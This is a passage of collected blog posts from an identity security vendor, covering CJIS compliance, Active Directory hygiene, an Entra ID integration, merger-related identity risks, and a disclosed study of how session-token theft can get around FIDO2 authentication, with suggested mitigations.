sensitive data, or Criminal Justice Information (CJI), and protect organizations from potential threats such as ransomware attacks and sanctions. In this article, you will learn about the CJIS Security Policy, and how Silverfort can help organizations comply with its identity security requirements, including the mandatory Advanced Authentication requirement of risk-based authentication and MFA. What is CJIS Compliance? CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is essentially any information that cannot be publicly disclosed except under certain circumstances, like by court order or when necessary for public safety. In particular, it refers to Federal Bureau of Investigation (FBI) data such as biometrics, biographics, case records, and other identifiable information about individuals, vehicles, or properties related to criminal activity. CJIS compliance requirements include access control, identification and authentication, the adoption of advanced authentication measures such as MFA and risk-based authentication, incident response, visibility into all accounts, and auditing. Contrary to what may be assumed, CJIS is not only relevant to law enforcement agencies, but to civil agencies as well. Specifically, state and local governments are increasingly becoming targets. First, attackers who gain access to state and local government networks could potentially infiltrate the FBI's networks using their CJIS credentials. And while it would probably be pretty challenging to shut down the entire FBI, the immediate threat is ransomware attacks, in which CJI data could be encrypted or even exposed. The specific guidelines for protecting data that falls under the category of CJI are outlined in the FBI's CJIS Security Policy. Quick Overview of the CJIS Security Policy The CJIS Security Policy defines the minimum security requirements for accessing and handling FBI criminal justice information throughout the entire CJI lifecycle, from creation to viewing, modification, transmission, dissemination, storage, and destruction. Currently, the CJIS Security Policy consists of 19 modules, or Policy Areas, each of which covers a different security aspect. This article will focus on the policy areas concerning identity security. The Identity Security Components of the CJIS Security Policy Policy Area 3: Incident Response (IR) IR Handling: Agencies are required to establish an operational incident response plan for managing, monitoring, documenting and reporting incidents. The plan should address every stage of the IR process, including preparation, training, detection, evidence collection, analysis, containment, eradication, and recovery. IR Assistance: Agencies should employ an IR assistance team that will provide expert advice and support in the handling, investigation, and reporting of incidents. Policy Area 4: Auditing and Accountability Agencies should implement audit and accountability controls to ensure that users do not deviate from their authorized behavior patterns. Audit logs should be retained for a minimum of 365 days, and include authentication logs for both successful and unsuccessful access attempts to systems and resources, password changes, attempts to access or modify user/resource/directory permissions, and actions involving privileged accounts. Policy Area 5: Access Control Integrate mechanisms to restrict access to CJI data, as well as to systems, applications, and services that provide access to CJI, including: Account Management: Maintain visibility into all accounts in your environment and perform annual validations. Access Enforcement: Assign and manage access privileges based on the least privileges necessary for each system, application or process to operate. Remote Access: Implement automated monitoring & access policies. Policy Area 6: Identification and Authentication To gain access to systems, services, and resources, users must be identified and authenticated in accordance with the Advanced Authentication requirement. As outlined in Section 5. 6. 2. 2 of the CJIS Security Policy, advanced authentication is mandatory and subject to audit as of October 1, 2024. Advanced authentication consists of: Multi-Factor Authentication (MFA): Requires the use of two or more different factors to authenticate successfully. The CJIS Security Policy breaks down authentication factors into the following categories: something you know (such as a personal identification number ), something you have (such as an authenticator or token), and something you are (such as biometrics). Risk-based Authentication (RBA): Authentication requests are accepted based on the risk calculated by a combination of factors such as network information, user information, user profiling, request patterns, geolocation, browser metadata, IP addresses previously authenticated successfully, and other adaptive authentication techniques.   Getting CJIS Compliant with Silverfort Policy Area 3: Incident Response (IR) Silverfort provides full visibility into and continuous monitoring and risk analysis of all authentication and access attempts, including sources, destinations, risk levels, and more. In addition, you can apply access policies, either created by you or by Silverfort, to ensure that if an access attempt deviates from normal behavior, the policy will provide alerts and/or deny access. If you experience an incident, Silverfort is able to assist you in containing the compromised accounts, investigating, and recovering. Policy Area 4: Auditing and Accountability In the Silverfort log screen you can view all authentication and access attempts, including those of user accounts, privileged accounts, and service accounts. You can filter by authentication type, account type, domain type, risk level, risk indicator, sources, destinations, protocols, time range, and more. Policy Area 5: Access Control Access policies are configured based on users, groups, and organizational units (OUs), as well as the least privileges necessary for your systems, processes, and applications. With full visibility into user accounts, privileged accounts, and service accounts in your environment, you can create and monitor log files to detect malicious or irregular activity, as well as perform validations at any time or interval. Policy Area 6: Identification and Authentication Silverfort can enforce MFA on all access requests, including on-prem, remote, legacy applications and more, and for all users, from regular users to privileged users and admins. Access policies can be configured as static or risk-based. As opposed to static policies, which are applied regardless of authentication risk level, risk-based policies are applied according to risk levels and risk indicators, such as abnormal authentication, users with SPNs, old passwords, old operating systems, malicious IPs, and more. For more information on how Silverfort can help you comply with the CJIS identity security requirements, schedule a call with one of our experts or request a quote. --- - Published: 2024-05-22 - Modified: 2024-05-22 - URL: https://www.silverfort.com/blog/introducing-our-official-global-partner-program-and-celebrating-leslie-bois-amy-kowalchyk-who-made-crns-2024-women-of-the-channel-list/ We’re so excited to share that CRN®, a brand of The Channel Company, named Silverfort’s Leslie Bois, Vice President of Global Channel Sales, and Amy Kowalchyk, Director of the American Channel, to the Women of the Channel list for 2024. Since bringing Bois on board in early 2023 to lead global channel sales, Silverfort has become a 100% channel-first organization, creating all the foundational elements from rules of engagement, target partners, portals, onboarding, training, and services certifications. Today, we also officially unveiled the Global Partner Program to meet the growing demand for unified identity security. Our comprehensive Unified Partner Program enables global channel and cyber insurance partners to create the ultimate identity protection framework, allowing partners to enjoy seamless integration with other products in the partner’s portfolio and access comprehensive training and compliance support. This will deliver the 360-degree protection organizations need in their complex environments, while supporting Silverfort’s channel-first strategy. We spent years researching and designing the identity security platform to enable modern identity security controls everywhere and eliminate the silos and blind spots that identity security suffers from. Silverfort, with the help of its partners, is hyper-focused on offering customers visibility and protection for all their identities, whether on-prem, in the cloud, human, or machine—including systems that no other solution can protect. Due to Silverfort’s customer-first mindset, partnering with organizations that have deep expertise in identity to protect customers together was the ideal strategy. Since the decision to make the company’s business 100% channel-based, revenues have grown rapidly—more than 100% year-over-year—with more than 90% of the revenues going through its channel program, and, in some regions, 100%. Every year, CRN highlights women from vendor, distributor, and solution provider organizations whose vision and leadership benefit the technology industry. The CRN 2024 Women of the Channel honorees are creative, strategic leaders who are committed to using their skills to innovate and drive success for their partners and customers. As Silverfort’s first North American channel hire, we’re excited to see Amy Kowalchyk recognized alongside Leslie. Amy is a strong advocate for the partners, Silverfort’s business, and her teammates. Since joining, she has spearheaded the execution of the company’s channel strategy in the region and doubled the pipeline and partner revenue year-over-year. At Silverfort, Leslie and Amy continue to build and execute a global channel strategy, allowing their partner community to expand their services offering and footprint in the emerging identity security space. “It is a great privilege to honor the remarkable achievements of these women leaders in the IT channel,” said Jennifer Follett, VP of U. S. Content and Executive Editor, CRN at The Channel Company. “Each woman on the list has demonstrated a deep commitment to innovation and leadership that advances their organizations and drives transformation and success across the IT channel. ” The 2024 Women of the Channel list will be featured in the June issue of CRN Magazine and online at www. CRN. com/WOTC. --- - Published: 2024-05-13 - Modified: 2024-05-13 - URL: https://www.silverfort.com/blog/identity-security-in-ma-gain-visibility-with-silverfort/ When a company intends to acquire another organization through a merger or purchase, it is important to know what security risks could accompany the acquisition. Without this, organizations could open themselves to significant financial and legal challenges.   Following an M&A, IT teams must merge different technologies and resources as the participating organizations become increasingly interconnected. A newly acquired environment brings its own IT systems, networks, and user accounts – along with its own unique risks – to an existing infrastructure. This can result in a highly complex environment where administrators may struggle to understand all the consolidated entity’s resources, applications, and users.   The new consolidated entity needs to be able to combine all domains and resources to a single unified IT infrastructure. This means understanding the type of accounts and resources you need to migrate; for example, which accounts are service accounts and what kind of applications you need to merge. In most cases, the IT team won’t know much about the acquired environment or its users.   This lack of visibility across the new environment, its resources and its users creates a major blind spot – and potentially many more security risks. Silverfort’s Domain Consolidation Protection  With Silverfort, organizations can quickly and easily migrate the new environment’s resources and users to the main entity domain, accelerating the post-merger integration process. Silverfort can also offer organizations complete visibility of their existing and incoming environments, allowing them to protect both and pinpoint any risks associated with the integration. By enforcing new security measures with Silverfort, organizations can proactively defend against incoming cyber threats such as lateral movement attacks.   Visibility and Monitoring of Service Accounts  Silverfort automatically identifies all service accounts and monitors their authentication and behavior within a consolidated environment. Silverfort is able to accomplish this as machine and service accounts exhibit predictable behavior patterns, allowing for automatic identification and categorization on the Service Accounts screen.   Silverfort also supports Group Managed Service Accounts (gMSA) and offers a filter that allows you to see every gMSA in your system. Each gMSA will be detected and treated as any service account. Screenshot #1: Silverfort’s Service Accounts screen displays the service account name, source, destination, number of authentications, risk score, baseline change and account info Silverfort identifies service accounts in several different ways:  • Behavioral Analysis – Silverfort tracks the account's behavior to identify repetitive traffic patterns.   • AD Configuration – Silverfort checks the account's attributes in AD to find characteristics common to service accounts.   • Naming Conventions – Silverfort holds a repository of naming conventions typically used for service accounts.   • Custom Insights – Silverfort receives feedback from the admin regarding the structure of service accounts in the customer environments (like OU, SG, and naming conventions).   • gMSA – The different account types defined in AD are used as service accounts.   Monitoring & Risk Analysis of Service Accounts After all the migrated service accounts have been identified, you can monitor their activity and associated risks. Silverfort provides real-time insights and visibility into all service account details and behavior, while continuously monitoring and auditing their use. With continuous monitoring of all authentication and access activities of all migrated service accounts, Silverfort can assess the risk associated with every authentication attempt and detect any suspicious behavior or anomalies. Screenshot #2: Silverfort’s investigation screen shows insights into a specific service account’s activity Visibility of User Activity & Authentications  Using the Logs screen in the Silverfort console, organizations will have complete visibility into all user logs and authentication activity. For those undergoing a merger, organizations will gain a better understanding of the incoming users, what they are trying to access, and what their risk score is. Screenshot #3: Silverfort’s authentication logs screen provides full visibility into all user logs, authentication activity, and risk indicators. You can view details of a user's logs, authentication activity and risk indicators, and gain more actionable insights by clicking the “investigate” icon next to the user in the Logs screen. With these details, organizations are equipped with complete visibility into each user and their authentication activity. Screenshot #4: Silverfort’s user investigation screen provides a detailed review of the authentication activities of a selected user to display their access requests in your environment. As a result of having full visibility into migrated resources, service accounts, and users, organizations can rest assured that their consolidated environment is being protected and their overall identity security posture management is up to date. Authentication Firewall in Action: Preventing a Lateral Movement Attack Across Multi-Domains  The need for improved visibility and security controls across all domain entities during M&A was highlighted for one of Silverfort’s customers. During April 2024, a European manufacturer sought out our Identity Security Services to help them with their threat-hunting capabilities, as they understood one of the companies they had acquired had been compromised and subjected to a cyber attack. As part of a larger acquisition, this customer had also acquired a smaller US-based entity which they integrated into their organization. At the time, they created a two-way trust between their entities' domains to integrate the smaller domain into the newly consolidated organization. Unknown to the IT team, the acquired entity had limited security controls in place: they did not have any MFA protection for VPN access or any EDR on the endpoint. As a result, the acquired entity was compromised by malicious actors who attempted to move laterally from the smaller entity to the customer's domain to conduct a ransomware attack. The Attack Flow:  Initial access: Using a secure VPN authentication, the attacker targeted three different users on seven servers with a brute force attack and successfully compromised them. Credential compromise: From its initial foothold in the environment and compromise of the target user, the attacker changed their password and created new users with the same privileges. Lateral movement: With the compromised account, the attacker attempted to move laterally to the larger domain, which is a Silverfort customer. The larger domain started to see malicious access attempts to their domain and reached out to Silverfort for assistance.   The Protection Flow:  In Silverfort’s console and working with the Silverfort threat-hunting team, they understood they were being attacked and quickly applied deny access policies to stop any access from the compromised entity's IP address.   The customer's security team segmented the entity's domain to ensure no malicious access could occur in their domain. This immediately blocked the lateral movement. Following the implementation of an authentication firewall with deny policies and identity segmentation, the team used Silverfort to track the authentication trail of the compromised accounts to the patient zero machine. They were then able to conclude remediation and remove the remaining malicious presence from the compromised domain.   This example proves how vital it is to have an identity protection solution that offers authentication firewall capabilities, including deny access enforcement policies, and identity segmentation features. As a result of having real-time visibility and proactive security controls in place, the organization prevented an attack by threat actors who possessed compromised credentials.   Looking to gain complete visibility across your environment? Reach out to one of our experts here.   --- - Published: 2024-05-09 - Modified: 2024-05-09 - URL: https://www.silverfort.com/blog/silverfort-announces-new-integration-with-microsoft-entra-id-eam/ Silverfort is excited to announce our integration with external authentication methods (EAM) in Microsoft Entra ID, which is now in public preview. This allows customers to use Silverfort seamlessly with any app or service that relies on Entra ID as an identity provider. Enhanced MFA and Threat Intelligence  In today’s rapidly evolving digital landscape, securing user identities has never been more critical. Microsoft Entra ID EAM paired with Silverfort to enhance organizations' identity posture without the complexities of managing multiple authenticators across their organization. This integration also introduces Silverfort threat intelligence into Entra ID cloud authentication flows, blocking bad actors from gaining access to applications residing in the cloud or on-prem.   Key Benefits of Integration  Silverfort’s integration with Microsoft Entra ID EAM offers multiple benefits, including:  Simplified User Experience: Users enjoy a smoother sign-in process with fewer disruptions, contributing to higher productivity and user satisfaction.   Enhanced Security: By extending MFA to all resources in the cloud and on-premises, organizations can better protect against identity-based attacks.   Unified Security Experience: Silverfort leverages authentication data from both on-prem and cloud applications, enhancing visibility into user behavior and effectively blocking potential breaches. This streamlined approach strengthens security across all platforms.   How It Works  Integrating Silverfort with Microsoft Entra ID is simple. Organizations can add Silverfort as an external authentication method in the Entra ID admin center, enabling it across their apps and services with just a few clicks. To learn more, visit the Silverfort external authentication method documentation here: https://docs. silverfort. com/docs/silverfort-as-an-external-authentication-method-in-entra-id Photo caption: External authentication methods are added from and listed in the authentication methods policies admin experience Our Partnership in Action  Our work with Microsoft is not just about one-off solutions; it is about building a secure identity ecosystem for customers. Here are a few of the other ways we work together:  Entra ID Bridge: This integration utilizes Entra ID SSO to facilitate the use of Entra as an authentication mechanism for on-prem resources, bridging the gap between cloud-based identity management and local enterprise environments.   Entra ID Sign-In Logs: This integration gives Silverfort visibility to cloud authentication traffic, enhancing the Silverfort Risk Estimation for users, which provides a more accurate risk estimation based on user activity both in Azure and on-prem.   Active Directory Integration: By integrating with Microsoft Active Directory, Silverfort ensures seamless identity management and security protocols across on-premises systems and those traditionally difficult to protect without the need to deploy an agent.   ADFS Integration: Our integration with Microsoft Active Directory Federation Services (ADFS) allows for robust federation capabilities, meaning any app or service protected by ADFS can leverage Silverfort MFA and intelligence.   Replacement of Entra ID Custom Controls with EAM: Silverfort supports the transition from Entra ID's custom controls to the new external authentication methods (EAM), enhancing the flexibility and management of authentication methods across Entra ID services.   Silverfort's integration with Microsoft Entra ID EAM represents a significant advancement in identity security. By simplifying and strengthening the authentication process, this integration not only improves security but enhances the user experience across multiple platforms. As digital threats are increasingly sophisticated, integrating Microsoft Entra with Silverfort via EAM allows organizations to stay a step ahead in protecting their critical assets. We are excited to deepen our partnership with Microsoft and are looking forward to sharing more about the additional integrations we are building soon!   --- - Published: 2024-05-06 - Modified: 2024-11-19 - URL: https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/ FIDO2 is a modern authentication group term for passwordless authentication. The Fast Identity Online (FIDO) Alliance developed it to replace the use of legacy known passwords and provide a secure method to authenticate using a physical or embedded key. FIDO2 is mostly known to protect people from man-in-the-middle (MITM), phishing and session hijacking attacks. In this article, I’ll take you through my research uncovering how to use MITM attacks to bypass FIDO2. First, I will outline a complete WebAuthn authentication flow, then walk through the protections of FIDO2. Then I will tackle famous attack techniques and provide real-life use cases. Lastly, I will discuss mitigations and what you can do to protect your enterprise. But first, some background The FIDO2 authentication flow consists of the WebAuthn API specification for a client relying party (RP) – which is the cloud application communication – and Client to Authenticator (CTAP) protocol for hardware communication. The entire process is managed by the browser and consists of two authentication steps: device registration and authentication. It is constructed this way because FIDO2 is based on a public key cryptography mechanism. This is where the client generates a private and public key and sends the latter back to RP for signature verification upon sign in. FIDO can be applied as an authentication method for a single application or in a federation. For those who don’t know, a federation refers to a single sign on (SSO) for multiple unrelated applications managed by a single identity provider (IdP). FIDO2 security features  FIDO2 is famous for its security features, mainly for preventing phishing, man-in-the-middle and session hijacking attacks. As part of my research, I wanted to see if FIDO2 is immune to these attacks – and I was surprised by the results. I started with session hijacking, an attack technique where the adversary steals a browser’s session to gain access to the user's application and private data. The second attack I investigated was a man-in-the-middle (MITM) attack on the IdP, where an adversary eavesdrops, modifies and relays communications between two devices that believe they are transmitting directly to each other. Today, MITM is more difficult to accomplish thanks to TLS protection. Even so, there are many methods to achieve a MITM, including DNS /DHCP spoofing, ARP poisoning and SLAAC. In addition, state actors have been known to overcome and decrypt TLS by stealing an organization’s certificate. One example is by attacking Active Directory Certification Services.   FIDO was designed to prevent these attacks. However, when implementing this modern authentication method, most applications do not protect the session tokens created after authentication is successful. I discovered many identity providers are still vulnerable to MITM and session hijacking attack types. To understand how this works, we need to go back to basics.   Over time, the basics of web communication have hardly changed. HTTP protocol and its features are broadly used over the World Wide Web, including the use of GET and POST to transfer attributes between endpoints and cookies to keep a session state for a client. Web applications and SSO protocols such as OIDC and SAML rely on the HTTP protocol and are required to follow its guidelines to keep a client state. Over the years, security over user sessions has improved in terms of how it is kept locally by the browser and how the application calculates it. However, these changes are not enough. How exactly does FIDO2 protect you?   For a successful FIDO2 authentication, the user must either register the FIDO device at the relying party or order the browser to perform a navigator. credentials. create function. This instructs the FIDO device to generate a private and public key for a specific user and bind it to a domain origin. The browser can then validate the domain origin of the relying party during the authentication process. Next is the authentication step, where the relying party calls the browser’s navigator. credentials. get for each authentication request. Once it’s triggered by the RP, the browser communicates with the FIDO security key through CTAP. If authentication is approved by the end user, the security key generates a signature using the stored private key. This signature is later verified by the RP using its public key.   In a phishing attack on a website with a different URL, the domain origin of the validated website will prevent potential credential theft because the URL doesn’t match the registered origin. However, the MITM attack mechanism is different. The prerequisite for an MITM attack is to have a trusted certificate by the target victim. Most modern browsers will alert and force secured authentication over TLS to a remote website. A successful MITM attack exposes the entire request and response content of the authentication process. When it ends, the adversary can acquire the generated state cookie and hijack the session from the victim. Put simply, there is no validation by the application after the authentication ends. Test use cases  I decided to take Entra IdP, PingFederate and Yubico as research use cases. Each operates differently and has its own pros and cons. Use case 1: Yubico Playground The Yubico Playground was created to demonstrate and test FIDO security features and keys. In this example, FIDO authenticates the user directly over HTTP to a local user database. Upon successful authentication, a cookie named "session" is generated. There is no validation on the device that requested this session, and any device can use this cookie until it expires. Acquiring this cookie could allow the adversary to bypass the authentication step, reach the user’s private area and, in this case, remove the security key from the user’s profile. This is a simple example of session hijacking; as we go to more complicated scenarios, we will see how this method shifts. Use case 2: Entra ID SSO The second use case is Entra ID SSO, which has security capabilities to authenticate over various SSO protocols and other modern authentication methods. Its Conditional Access – authentication strength feature limits passwordless mechanisms – specifically FIDO2. Our test validated native Microsoft applications such as Office 365 and Azure Management portal over OpenID Connect (OIDC) protocol and Example 3rd party application over SAML protocol. In both federation protocols, the IdP provides a signed access token with an expiration time of 1 hour that is passed as a POST attribute to the relying party. In the federation mechanism, the adversary doesn’t even have to relay the authentication process. The attacker just needs a signed token, and it can be used again in the right time frame and generate state cookies within a longer time frame. OIDC supports refresh tokens which can generate session tokens for an extended period. We can see in the following example that the native Azure Management portal application does not validate the token granted by the SSO. Use case 3: PingFederate The third use case is PingFederate. This umbrella application provides federation SSO for a large variety of enterprise applications. Unlike Entra, Ping uses third-party adapters to perform authentication. These adapters can be chained into an authentication policy flow. Each adapter has its own context and is separated from the other. Successful authentication is where a user meets the requirements of all the adapters in the policy. FIDO2 capabilities can be used with the PingOne adapter. Surprisingly, our team discovered that if the relying party developer doesn’t validate the OIDC token (or SAML Response), the outlined MITM attack will be successful. Authentication weakest link  The SSO use cases are more severe from the direct approach. As more players are involved in the authentication process, the relying party has less control of validating the integrity of the source device. Even though FIDO protects against MITM attacks, the whole chain relies on its weakest links, which are the SSO protocols where their granting tokens can be reused by a different device.   Mitigations and next thoughts  What if there was a way to verify that the authenticated session is used solely by the authenticated client? Introducing Token Binding, a proposed standard requested in 2018.   Token Binding allows applications and services to cryptographically bind their security tokens to the TLS layer to mitigate token theft and MITM attacks. Token Binding v1. 0 will bind the entire session to its underlying TLS handshake. The public key cryptography extends beyond the authentication context, and WebAuthn will securely deliver the token binding signature. But how does Token Binding work?   Upon Client-Server Hello, a Token Binding extension is available.   The two endpoints agree on TLS fields that the client will sign. Exactly like in WebAuthn, the browser creates a long-lived private/public keypair. The client sends the public key to the RP for signature verification; then the signature is sent over the application layer. The server verifies the signature and binds it to the session token.   I initially conducted this research in Mid-2023, and submitted the findings to Microsoft. In response to initial disclosure, Microsoft claimed this is not a vulnerability. Even so, it is an attack surface that could cause damage to an exposed organization. Four months later, Microsoft presented a conditional access preview of Token Protection, which is a variant of token binding specifically for Trusted Platform Module (TPM). In its documentation Microsoft explains that token theft is rare, but the damage from it can be significant. In the case of web applications, TPM may act similarly to FIDO using a different communication method to the security chip. However, WebAuthn protocol stays the same for browser and RP communication. The current preview is limited to specific Web applications and Windows client versions. The current configuration is cumbersome, and in the future Microsoft will expand the feature to generic FIDO security keys.   To date, Microsoft EDGE is the only browser that offers Token Binding. Chrome offered Token Binding but removed it due to low adoption. Token Binding’s proposal discusses two types of device binding. One for direct authentication is called Provided Token Binding. This type is common in simple applications like the Yubico playground. The second type, Referred Token Binding discusses the protection of both the Identity provider and the relying party. In any of the cases, WebAuthn may pass the Token Binding signature securely on the authentication phase. It is recommended for application managers to require Token Binding on a FIDO2 authentication, if available. When designing an authentication mechanism, you need to understand your threat attribution and build your authentication accordingly. In sensitive cases, the direct approach is recommended as the application may have more control over the session token.   For application developers, we recommend adding token binding to the FIDO2 authentication process if possible, or at least limit the OIDC token or SAML response usage of each successful authentication to be used once. It is concerning that the great security features of FIDO2 are not protecting the entire user session. It is important to understand that modern authentication methods are not a magic security charm, and it is not enough just to buy and implement – you need to deeply understand its pros and cons. To learn more about Silverfort, get a demo here. --- - Published: 2024-05-02 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/silverfort-to-unveil-research-at-rsa-2024/ Next week is a big week for Silverfort. Many people on our team are heading to California to attend the annual RSA conference. If you’re visiting, come find us in Moscone South at Booth #3333. This year is extra special for our team, though. We’re excited that one of our own rising star researchers, Dor Segal (who has spent over a decade doing security research after cutting his teeth in Israel’s 8200 unit), will be unveiling how MITM attacks can still bypass modern authentication methods like FIDO2.   Dor’s session will explore the strengths and weaknesses of passwordless authentication (FIDO2) and WebAuthn protocol fundamentals. He will demonstrate how a standard MITM attack could be used to hijack a FIDO2 authenticated session as an example of a modern authentication method, replicate the token, and use it in other sessions at will. While FIDO2 improves the security of the authentication, its defenses don’t always extend to the session itself. The way it’s implemented in most applications, specifically browsers and web-based SSO, leaves the actual session exposed to compromise. Dor will demo a MITM attack to show how an attacker can steal credentials from known federation providers like Entra ID, and he’ll propose some mitigation techniques for both application managers and developers. (Spoiler Alert: Token Binding is essential! )  Stop by this session on Monday, May 6th at 10:50 in Moscone West, Room 2014.   See you there! --- - Published: 2024-04-24 - Modified: 2024-04-24 - URL: https://www.silverfort.com/blog/5-ways-to-step-up-your-ad-hygiene-with-silverfort/ Active Directory (AD) is the backbone of most organizations' networks, managing access and authentication for users, devices and applications. While AD provides both users and administrators with central services, its security has not kept pace with growing modern security risks. As a tempting target for threat actors, this is a huge concern for businesses, forcing them to invest time and resources to ensure their AD hygiene is up to par. Maintaining Proper AD Hygiene is Essential  AD hygiene refers to the practices and measures implemented to ensure the cleanliness, organization, and security of an organization's AD environment. It exists to prevent, detect, and respond to security threats within the AD infrastructure. A properly maintained AD security hygiene program is essential for an organization's overall security hygiene against identity security threats.   A fundamental aspect of AD hygiene is regular auditing and monitoring, cleaning up outdated or unused accounts, enforcing strong password policies, and monitoring user activities. This involves conducting periodic reviews of AD configurations, user accounts, group memberships, and access permissions to identify any malicious activities or anomalies.   Failure to manage AD effectively can lead to a myriad of identity security risks, with one of the most significant being a lack of visibility into users and their associated risks.   When organizations lack visibility into the types of users in their AD environment and the potential risks they pose, they are unable to effectively assess and mitigate security threats. For example, stale or orphaned accounts, unauthorized access privileges, and other types of risk accounts can go undetected, leaving an organization exposed to identity threats.   Silverfort AD Hygiene Capabilities Silverfort's AD hygiene capabilities help organizations proactively manage their user base by automatically discovering all user accounts, service accounts, and other types of users within their AD environment and providing centralized visibility into every authentication and access request.   Organizations gain a unified view of all users, resources, and authentication activities due to Silverfort’s native Active Directory integration, which enables it to log every authentication request.   Furthermore, Silverfort provides a user inventory that displays the types of users and resources in your environment, as well as potential security weaknesses that adversaries may exploit. This enables administrators to identify where their security risks are and how to prioritize their efforts to eliminate these risks.   By gathering actionable insights and taking proactive measures to enhance one's AD hygiene posture management, Silverfort makes it significantly harder for threat actors to target the organization, thus bolstering its overall resilience against identity threats.   5 Ways Silverfort Can Help You Strengthen Your AD Hygiene Posture Management  1. Detect Shadow Admins  Shadow admins are users who have admin capabilities that you may not be aware of due to ACLs or nested groups. How does Silverfort detect shadow admins? Silverfort identifies shadow admin accounts based on their privileges and the permissions they have been granted, in both on-prem and cloud environments. Screenshot #1: Filtering for shadow admins in the Silverfort logs screen Customer Example: At a Fortune 500 financial company, Silverfort detected 109 new shadow admins created by a single AD misconfiguration. By detecting and removing the privileges of these admin accounts, the customer decreased their attack exposure. 2. Reducing NTLMv1 Usage NTLMv1 is inherently insecure due to its use of weak encryption (DES) to encrypt the session key. This encryption type can be easily broken, and the user's password can be extracted. How does Silverfort detect NTLMv1? Silverfort monitors all authentications processed by Active Directory without using event logs. It identifies which devices are sending NTLMv1 authentication requests and sends alerts to the logs screen inside the Silverfort platform. Screenshot #2: Filtering for users who are using NTLMv1 in the Silverfort logs screen Customer Example: In a leading global manufacturer’s environment, Silverfort discovered that around 5-8% of admin users still authenticate with NTLMv1 protocol, which was exposing their user passwords to compromise. Weekly reports are now sent to the team so they can reduce and ultimately eliminate the use of NTLMv1. 3. Discover Stale Users Stale users are accounts that have not been used for a while; for example, former employees’ accounts that have not been disabled. Certain types of stale accounts are difficult to identify unless you are able to monitor their authentication activity. As an example, identifying service accounts is difficult since their information is not available natively. How does Silverfort detect stale users? Silverfort automatically identifies and discovers stale users based on a lack of user activity data and information gathered from logs and other sources. Screenshot #3: Filtering for stale users in the Silverfort logs screen Customer Example: At a leading US retail company, Silverfort detected that 13% of user accounts were stale users who had not performed any recent activity. This helped the company to clean up its Active Directory by disabling/removing the unused accounts, which ultimately helped decrease licensing and minimize costs. 4. Disable Admins with SPN Having a Service Principal Name (SPN) associated with an admin account can expose it to a Kerberoasting attack, where an attacker requests the Kerberos ticket and obtains a payload encrypted by the user’s password hash. Attackers can then brute force this payload to expose the credentials and compromise the account. How does Silverfort detect Admins with SPN? Silverfort detects these types of accounts by monitoring authentication events involving Service Principal Names (SPNs) within the network. It utilizes behavioral analytics and user behavior profiling to identify deviations from normal patterns, such as unusual access requests or privilege escalation attempts associated with admin privileges. Screenshot #4: Filtering for admins with SPN in the Silverfort logs screen Customer Example: In a large healthcare provider’s AD environment, Silverfort discovered 8 admins with SPN that the customer was not aware of. This helped the customer to limit their exposure to potential Kerberoasting attacks and decrease their attack surface exposure. 5. Removing PrintNightmare  PrintNightmare is a critical security vulnerability affecting Windows’ Print Spooler service that allows remote code execution and could lead to unauthorized access or system compromise. How does Silverfort detect bad authentications from patched Print Spooler services? Silverfort detects PrintNightmare by analyzing authentication events and abnormal service behavior and triggering alerts for further investigation and mitigation. Microsoft explains how to fully mitigate PrintNightmare but with Silverfort you can completely skip the problematic network packet capture as it will alert on all the bad Print Spooler authentications. Screenshot #5: Filtering for abnormal authentications in the Silverfort logs screen Customer Example: A large US school district detected PrintNightmare in their environment thanks to Silverfort. With Silverfort they fixed this issue and reduced the number of unnecessary authentications in their environment by about 70%. Real-Time Visibility and Actionable Insights is Critical for AD Hygiene  To maintain proper Active Directory hygiene and strengthen identity security posture management within organizations, it is crucial to have end-to-end visibility and actionable insights into all your users and resources. By having all the insights into your AD user base, you can take proactive steps to ensure that your user base is not opening the door to identity threats. This will strengthen your overall identity security posture management (ISPM)  By investing the resources to step up your AD hygiene you will ensure its cleanliness and security is up to date to prevent your AD environment from being compromised and used as a gateway for attackers to gain unauthorized access to sensitive data.   Looking to strengthen your AD hygiene and gain complete visibility across your environment? Reach out to one of our experts here.   --- - Published: 2024-03-26 - Modified: 2024-10-02 - URL: https://www.silverfort.com/blog/the-identity-underground-report-deep-insight-into-the-most-critical-identity-security-gaps/ We’re proud to unveil the first report based on Silverfort’s proprietary data: The Identity Underground Report. This data, gathered and analyzed from hundreds of production environments, discloses the key security gaps – or Identity Threat Exposures (ITEs) – that adversaries exploit to launch identity threats such as credential access, privilege escalation and lateral movement. This is the first ever comprehensive analysis of these weaknesses. In fact, some of these ITEs have never been disclosed at all – until now. The results are alarming: no environment is free from the gaps that give attackers easy opportunities to access credentials, escalate privileges, and move laterally with little to no resistance. Are you a CISO? Then you’ll want to ask your team if the common gaps in the report apply to your environment as well. These are the culprits behind the attacks that keep you awake at night. Knowing them should become a factor in your decision making.   Are you a security architect or a SOC manager? You already know that identity is the most abused attack surface in account takeover, lateral movement, and ransomware spread. Now you can gain full insight into what you need to protect.   And finally, are you accountable for the identity security in your organization? Then you’ll find all the challenges you’re already confronting daily: shadow admins, NTLMv1, unconstrained delegation, service accounts, password sync and many more. These gaps enable threat actors to win the war against identity threat  Identity threats are at large. Lateral movment, preceeded by credential theft and privilege escalation, is now a key part of almost every ransomware campaign. Yet a thorough understanding of the scope and nature of the gaps that make these attacks possible is not part of organizations’ cybersecurity playbooks. In fact, they don’t even have a name. They are not software vulnerabilities with an assigned CVE, nor are they malware. Rather, they are an inevitable result of misconfigurations, malpractices, legacy infrastructure, and insecure built-in feautures. They share a common denominator: each of them exposes its environment to an identity-related TTP, such as credential access, privilege escalation, or lateral movement. This is why we call them Identity Threat Exposures (ITE).   The Identity Underground Report is the first report to shed light on the dark corners of the identity infrastructure, unveiling the ITEs that are most prevalent, impactful and exploitable. Put simply, at least some of them reside in your environment. Report highlights: Active Directory ITE endangers the SaaS environment  Key insight #1: Active Directory (AD) is critially exposed to identity threats  Around 90% of organizations employ a hybrid identity infrastructure. This means Active Directory (AD) still plays a key role alongside cloud directories or federation servers. However, AD is infested with misconfigurations, legacy infrastructure, and built-in insecure features. These, together with common malpractices, turn it into an extremely low-resilience attack surface. In simple terms, attackers can easily use the AD environment to slip through to the target environment for either ransomware, data theft, or any other purpose. This report discloses the most prominent ones.   Key insight #2: AD’s exposure to identity threats also endangers the SaaS environment  The common practice of syncing AD passwords to the organization’s cloud Identity Provider (IdP) has significant productivity benefits. It can also create a critical threat exposure. Consider this: when passwords are synced, attackers can use the passwords they’ve compromised in the AD environment for malicious access to the SaaS environment. As the report shows, ITEs that expose user passwords in the AD environment are extremely 